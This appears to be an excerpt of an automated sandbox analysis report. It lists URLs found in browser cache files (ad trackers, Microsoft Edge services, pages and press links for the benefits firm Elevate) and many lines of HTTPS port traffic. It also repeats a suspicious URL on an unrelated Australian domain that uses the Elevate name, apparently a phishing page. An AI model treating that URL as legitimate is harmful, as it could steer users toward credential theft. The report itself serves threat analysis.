          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://outlook.office.com/mail/inbox?isExtension=true&sharedHeader=1&client_flight=outlookedge
          Source: chromecache_820.2.drString found in binary or memory: https://pagead2.googlesyndication.com
          Source: chromecache_849.2.dr, chromecache_813.2.dr, chromecache_860.2.dr, chromecache_809.2.dr, chromecache_820.2.drString found in binary or memory: https://pagead2.googlesyndication.com/ccm/collect
          Source: chromecache_849.2.dr, chromecache_813.2.dr, chromecache_860.2.dr, chromecache_809.2.dr, chromecache_820.2.drString found in binary or memory: https://pagead2.googlesyndication.com/ccm/conversion
          Source: chromecache_849.2.dr, chromecache_813.2.dr, chromecache_860.2.dr, chromecache_809.2.dr, chromecache_820.2.drString found in binary or memory: https://pagead2.googlesyndication.com/pagead/conversion
          Source: chromecache_849.2.dr, chromecache_813.2.dr, chromecache_860.2.dr, chromecache_809.2.dr, chromecache_820.2.drString found in binary or memory: https://pagead2.googlesyndication.com/pagead/gen_204?id=tcfe
          Source: chromecache_811.2.dr, chromecache_805.2.drString found in binary or memory: https://player.vimeo.com/NOTICE.txt
          Source: chromecache_829.2.drString found in binary or memory: https://player.vimeo.com/api/player.js
          Source: chromecache_829.2.drString found in binary or memory: https://player.vimeo.com/video/961277965?autoplay=0&muted=1&loop=1&background=0
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://powerpoint.new?from=EdgeM365Shoreline
          Source: 2cc80dabc69f58b6_1.18.drString found in binary or memory: https://prod-streaming-video-msn-com.akamaized.net/
          Source: chromecache_860.2.drString found in binary or memory: https://px.ads.linkedin.com/collect?
          Source: chromecache_789.2.dr, chromecache_796.2.dr, chromecache_831.2.dr, chromecache_855.2.dr, chromecache_862.2.dr, chromecache_829.2.dr, chromecache_822.2.dr, chromecache_833.2.dr, chromecache_834.2.dr, chromecache_791.2.dr, chromecache_819.2.dr, chromecache_784.2.dr, chromecache_840.2.drString found in binary or memory: https://reefe.com.au/ab/elevateinc/check/index.html
          Source: 2cc80dabc69f58b6_1.18.drString found in binary or memory: https://sb.scorecardresearch.com/
          Source: chromecache_860.2.drString found in binary or memory: https://snap.licdn.com/li.lms-analytics/insight.min.js
          Source: 4cb013792b196a35_1.18.dr, 2cc80dabc69f58b6_1.18.drString found in binary or memory: https://srtb.msn.cn/
          Source: 4cb013792b196a35_1.18.dr, 2cc80dabc69f58b6_1.18.drString found in binary or memory: https://srtb.msn.com/
          Source: chromecache_844.2.drString found in binary or memory: https://stackoverflow.com/questions/15751012/
          Source: chromecache_849.2.dr, chromecache_809.2.drString found in binary or memory: https://stats.g.doubleclick.net/g/collect
          Source: chromecache_849.2.dr, chromecache_809.2.drString found in binary or memory: https://stats.g.doubleclick.net/g/collect?v=2&
          Source: chromecache_813.2.dr, chromecache_860.2.dr, chromecache_820.2.drString found in binary or memory: https://td.doubleclick.net/td/rul/
          Source: chromecache_862.2.dr, chromecache_829.2.drString found in binary or memory: https://techcrunch.com/2021/10/04/elevate-launches-its-approach-to-managing-pre-tax-benefits-with-12
          Source: chromecache_862.2.dr, chromecache_829.2.drString found in binary or memory: https://techcrunch.com/2023/04/13/elevate-lands-28m-to-help-employers-better-manage-benefits/
          Source: chromecache_862.2.dr, chromecache_829.2.drString found in binary or memory: https://technical.ly/2021/11/02/elevate-brian-strom/
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://tidal.com/
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://twitter.com/
          Source: chromecache_822.2.dr, chromecache_833.2.dr, chromecache_834.2.dr, chromecache_784.2.dr, chromecache_840.2.drString found in binary or memory: https://twitter.com/elevatedotinc
          Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.18.drString found in binary or memory: https://unitedstates1.ss.wd.microsoft.us/
          Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.18.drString found in binary or memory: https://unitedstates2.ss.wd.microsoft.us/
          Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.18.drString found in binary or memory: https://unitedstates4.ss.wd.microsoft.us/
          Source: chromecache_818.2.drString found in binary or memory: https://use.typekit.net
          Source: chromecache_840.2.drString found in binary or memory: https://user.elevateaccounts.com/login
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://vibe.naver.com/today
          Source: chromecache_838.2.drString found in binary or memory: https://vimeo.com/ablincoln/vuid
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://web.skype.com/?browsername=edge_canary_shoreline
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://web.skype.com/?browsername=edge_stable_shoreline
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://web.telegram.org/
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://web.whatsapp.com
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://word.new?from=EdgeM365Shoreline
          Source: Favicons.18.drString found in binary or memory: https://www.aliexpress.com/
          Source: Favicons.18.drString found in binary or memory: https://www.amazon.com/
          Source: chromecache_862.2.dr, chromecache_829.2.drString found in binary or memory: https://www.benefitnews.com/list/3-challenges-hr-leaders-are-facing-in-todays-digital-benefits-world
          Source: chromecache_862.2.drString found in binary or memory: https://www.benefitnews.com/news/elevate-is-making-it-so-that-employees-dont-have-to-choose-between-
          Source: chromecache_862.2.dr, chromecache_829.2.drString found in binary or memory: https://www.benefitnews.com/opinion/incorporating-preventative-care-into-your-post-covid-benefits-ex
          Source: chromecache_862.2.dr, chromecache_829.2.drString found in binary or memory: https://www.benefitspro.com/2021/10/29/bringing-consumer-directed-benefits-into-the-digital-era
          Source: chromecache_862.2.dr, chromecache_829.2.drString found in binary or memory: https://www.benefitspro.com/2022/06/24/education-empowers-employees-to-better-leverage-benefits-a-lo
          Source: chromecache_862.2.dr, chromecache_829.2.drString found in binary or memory: https://www.benefitspro.com/2022/10/18/employees-are-putting-off-health-care-needs-due-to-financial-
          Source: chromecache_862.2.dr, chromecache_829.2.drString found in binary or memory: https://www.benefitspro.com/2024/09/03/ai-is-coming-to-benefits-top-3-strategies-for-hr-leaders/
          Source: chromecache_862.2.dr, chromecache_829.2.dr, chromecache_834.2.dr, chromecache_784.2.dr, chromecache_840.2.drString found in binary or memory: https://www.benefitspro.com/2024/09/10/open-enrollment-might-look-different-this-year-with-new-ai-en
          Source: chromecache_862.2.dr, chromecache_829.2.drString found in binary or memory: https://www.builtincolorado.com/2021/10/05/elevate-raises-12m-series-a-hsa-fsa-benefits-platform
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://www.deezer.com/
          Source: chromecache_829.2.drString found in binary or memory: https://www.elevate.inc
          Source: chromecache_796.2.drString found in binary or memory: https://www.elevate.inc/blog
          Source: chromecache_789.2.dr, chromecache_855.2.dr, chromecache_834.2.dr, chromecache_784.2.dr, chromecache_840.2.drString found in binary or memory: https://www.elevate.inc/case-studies/rippling
          Source: chromecache_831.2.drString found in binary or memory: https://www.elevate.inc/component-parts
          Source: chromecache_819.2.drString found in binary or memory: https://www.elevate.inc/our-story
          Source: chromecache_862.2.drString found in binary or memory: https://www.elevate.inc/press
          Source: chromecache_822.2.drString found in binary or memory: https://www.elevate.inc/request-a-demo
          Source: chromecache_833.2.drString found in binary or memory: https://www.elevate.inc/resource-center
          Source: chromecache_784.2.drString found in binary or memory: https://www.elevate.inc/use-cases/benefit-platforms
          Source: chromecache_855.2.drString found in binary or memory: https://www.elevate.inc/use-cases/financial-institutions
          Source: chromecache_840.2.drString found in binary or memory: https://www.elevate.inc/use-cases/health-plans
          Source: chromecache_789.2.drString found in binary or memory: https://www.elevate.inc/use-cases/peo-software
          Source: chromecache_834.2.drString found in binary or memory: https://www.elevate.inc/use-cases/third-party-administrators
          Source: chromecache_791.2.drString found in binary or memory: https://www.elevate.inc/why-elevate
          Source: chromecache_820.2.drString found in binary or memory: https://www.google.com
          Source: chromecache_849.2.dr, chromecache_813.2.dr, chromecache_860.2.dr, chromecache_809.2.dr, chromecache_820.2.drString found in binary or memory: https://www.google.com/ccm/collect
          Source: chromecache_820.2.drString found in binary or memory: https://www.google.com/ccm/conversion
          Source: chromecache_820.2.drString found in binary or memory: https://www.google.com/ccm/form-data
          Source: Web Data.18.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: chromecache_849.2.dr, chromecache_813.2.dr, chromecache_860.2.dr, chromecache_809.2.dr, chromecache_820.2.drString found in binary or memory: https://www.google.com/pagead/1p-conversion
          Source: chromecache_782.2.dr, chromecache_851.2.drString found in binary or memory: https://www.google.com/pagead/1p-user-list/11308007612/?random
          Source: chromecache_849.2.dr, chromecache_813.2.dr, chromecache_860.2.dr, chromecache_809.2.dr, chromecache_820.2.drString found in binary or memory: https://www.google.com/pagead/form-data
          Source: chromecache_849.2.dr, chromecache_813.2.dr, chromecache_860.2.dr, chromecache_809.2.dr, chromecache_820.2.drString found in binary or memory: https://www.google.com/travel/flights/click/conversion
          Source: chromecache_820.2.drString found in binary or memory: https://www.googleadservices.com
          Source: chromecache_820.2.drString found in binary or memory: https://www.googleadservices.com/ccm/conversion
          Source: chromecache_849.2.dr, chromecache_813.2.dr, chromecache_860.2.dr, chromecache_809.2.dr, chromecache_820.2.drString found in binary or memory: https://www.googleadservices.com/pagead/conversion
          Source: chromecache_820.2.drString found in binary or memory: https://www.googletagmanager.com
          Source: chromecache_849.2.dr, chromecache_813.2.dr, chromecache_860.2.dr, chromecache_809.2.dr, chromecache_820.2.drString found in binary or memory: https://www.googletagmanager.com/a?
          Source: chromecache_789.2.dr, chromecache_796.2.dr, chromecache_831.2.dr, chromecache_855.2.dr, chromecache_862.2.dr, chromecache_829.2.dr, chromecache_822.2.dr, chromecache_833.2.dr, chromecache_834.2.dr, chromecache_791.2.dr, chromecache_819.2.dr, chromecache_784.2.dr, chromecache_840.2.drString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=G-P9P7XCFQQT
          Source: chromecache_789.2.dr, chromecache_796.2.dr, chromecache_831.2.dr, chromecache_855.2.dr, chromecache_862.2.dr, chromecache_829.2.dr, chromecache_822.2.dr, chromecache_833.2.dr, chromecache_834.2.dr, chromecache_791.2.dr, chromecache_819.2.dr, chromecache_784.2.dr, chromecache_840.2.drString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
          Source: chromecache_789.2.dr, chromecache_796.2.dr, chromecache_831.2.dr, chromecache_855.2.dr, chromecache_862.2.dr, chromecache_829.2.dr, chromecache_822.2.dr, chromecache_833.2.dr, chromecache_834.2.dr, chromecache_791.2.dr, chromecache_819.2.dr, chromecache_784.2.dr, chromecache_840.2.drString found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-WTL5WC6F
          Source: chromecache_849.2.dr, chromecache_813.2.dr, chromecache_860.2.dr, chromecache_809.2.dr, chromecache_820.2.drString found in binary or memory: https://www.googletagmanager.com/static/service_worker/
          Source: offscreendocument_main.js.18.drString found in binary or memory: https://www.gstatic.com/_/apps-fileview/_/js/
          Source: chromecache_862.2.drString found in binary or memory: https://www.hrtechoutlook.com/news/elevate-and-visa-collaborated-to-provide-push-to-debit-health-rei
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://www.iheart.com/podcast/
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://www.instagram.com
          Source: chromecache_789.2.dr, chromecache_796.2.dr, chromecache_831.2.dr, chromecache_855.2.dr, chromecache_862.2.dr, chromecache_829.2.dr, chromecache_822.2.dr, chromecache_833.2.dr, chromecache_834.2.dr, chromecache_791.2.dr, chromecache_819.2.dr, chromecache_784.2.dr, chromecache_840.2.drString found in binary or memory: https://www.instagram.com/elevatedotinc/
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://www.last.fm/
          Source: chromecache_822.2.dr, chromecache_833.2.dr, chromecache_834.2.dr, chromecache_791.2.dr, chromecache_819.2.dr, chromecache_784.2.dr, chromecache_840.2.drString found in binary or memory: https://www.linkedin.com/company/elevatedotinc
          Source: chromecache_819.2.drString found in binary or memory: https://www.linkedin.com/in/aliciamainoberg/
          Source: chromecache_819.2.drString found in binary or memory: https://www.linkedin.com/in/amanda-richter-4a22a5215/
          Source: chromecache_819.2.drString found in binary or memory: https://www.linkedin.com/in/bstrom/
          Source: chromecache_819.2.drString found in binary or memory: https://www.linkedin.com/in/cosgray/
          Source: chromecache_819.2.drString found in binary or memory: https://www.linkedin.com/in/keithsoranno/
          Source: chromecache_819.2.drString found in binary or memory: https://www.linkedin.com/in/scottrosecoo/
          Source: Favicons.18.drString found in binary or memory: https://www.live.com/
          Source: chromecache_849.2.dr, chromecache_809.2.drString found in binary or memory: https://www.merchant-center-analytics.goog
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://www.messenger.com
          Source: 2cc80dabc69f58b6_1.18.drString found in binary or memory: https://www.msn.com/web-notification-icon-light.png
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&game
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&item
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&item=fl
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&playInS
          Source: Favicons.18.drString found in binary or memory: https://www.netflix.com/
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://www.office.com
          Source: Favicons.18.drString found in binary or memory: https://www.office.com/
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://www.officeplus.cn/?sid=shoreline&endpoint=OPPC&source=OPCNshoreline
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=1
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=2
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=1
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=2
          Source: chromecache_862.2.drString found in binary or memory: https://www.prnewswire.com/news-releases/benefits-platform-elevate-raises-28m-in-growth-funding-3017
          Source: chromecache_862.2.drString found in binary or memory: https://www.prnewswire.com/news-releases/elevate-and-visa-collaborate-on-push-to-debit-health-reimbu
          Source: chromecache_862.2.drString found in binary or memory: https://www.prnewswire.com/news-releases/elevate-drivewealth-and-intellicents-partner-to-deliver-emb
          Source: chromecache_862.2.drString found in binary or memory: https://www.prnewswire.com/news-releases/elevate-honored-with-2024-hr-tech-award-for-ai-innovations-
          Source: chromecache_862.2.drString found in binary or memory: https://www.prnewswire.com/news-releases/elevate-honored-with-benefitspros-2024-luminaries-award-302
          Source: chromecache_862.2.drString found in binary or memory: https://www.prnewswire.com/news-releases/elevate-lands-more-top-flight-talent-as-several-employee-be
          Source: chromecache_862.2.drString found in binary or memory: https://www.prnewswire.com/news-releases/elevate-launches-with-15m-funding-to-modernize-consumer-dir
          Source: chromecache_862.2.drString found in binary or memory: https://www.prnewswire.com/news-releases/elevate-named-best-consumer-payments-platform-in-9th-annual
          Source: chromecache_862.2.drString found in binary or memory: https://www.prnewswire.com/news-releases/elevate-named-to-incs-2024-best-in-business-list-as-on-the-
          Source: chromecache_862.2.drString found in binary or memory: https://www.prnewswire.com/news-releases/elevate-secures-20-million-in-growth-funding-led-by-fin-cap
          Source: chromecache_862.2.drString found in binary or memory: https://www.prnewswire.com/news-releases/employee-benefit-news-names-elevates-brian-strom-as-outstan
          Source: chromecache_862.2.drString found in binary or memory: https://www.prnewswire.com/news-releases/employers-demand-ai-to-improve-benefits-administration-and-
          Source: chromecache_862.2.drString found in binary or memory: https://www.pymnts.com/partnerships/2022/elevate-teams-with-visa-on-push-to-debit-health-reimburseme
          Source: Favicons.18.drString found in binary or memory: https://www.reddit.com/
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://www.tiktok.com/
          Source: chromecache_849.2.dr, chromecache_813.2.dr, chromecache_860.2.dr, chromecache_809.2.dr, 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.dr, chromecache_820.2.drString found in binary or memory: https://www.youtube.com
          Source: Favicons.18.drString found in binary or memory: https://www.youtube.com/
          Source: chromecache_849.2.dr, chromecache_809.2.drString found in binary or memory: https://www.youtube.com/iframe_api
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: https://y.music.163.com/m/
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
          Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49686 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
          Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
          Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
          Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
          Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
          Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
          Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
          Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
          Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
          Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
          Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
          Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
          Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
          Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
          Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49682 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
          Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
          Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
          Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
          Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
          Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
          Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
          Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
          Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
          Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
